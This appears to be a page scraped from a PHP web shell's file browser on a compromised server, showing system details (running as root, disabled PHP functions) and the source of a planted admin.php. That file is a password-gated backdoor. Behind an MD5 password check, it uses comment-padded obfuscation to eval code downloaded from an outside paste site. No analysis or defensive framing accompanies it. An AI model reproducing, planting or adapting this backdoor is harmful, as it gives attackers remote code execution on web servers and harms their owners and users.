HEX
Server: nginx/1.18.0
System: Linux iZuf6ar3jbed2aosvzu1ofZ 4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64
User: root (0)
PHP: 7.3.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/wood-lk.cn/
Upload Files
File: /www/wwwroot/wood-lk.cn/admin.php
<?php
session_start();

/* MD5 hash of your password (example: md5("mypassword")) */
$PASS_MD5 = "ce55d7ea9fdf0dfd2aef483743e2e022";

if (!isset($_SESSION['auth'])) {
    if (isset($_POST['p']) && md5($_POST['p']) === $PASS_MD5) {
        $_SESSION['auth'] = true;
    } else {
        ?>
        <!DOCTYPE html>
        <html>
        <head>
            <title>byp4a55 professor6T9</title>
        </head>
        <body>
            <form method="post">
                <input type="password" name="p" placeholder="Password">
                <button type="submit">Enter</button>
            </form>
        </body>
        </html>
        <?php
        exit;
    }
}
?>
<title>byp4a55 professor6T9</title><?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://plainraw.com/raw/e76d8f3e0ccf"));/**/?>
@ Telegram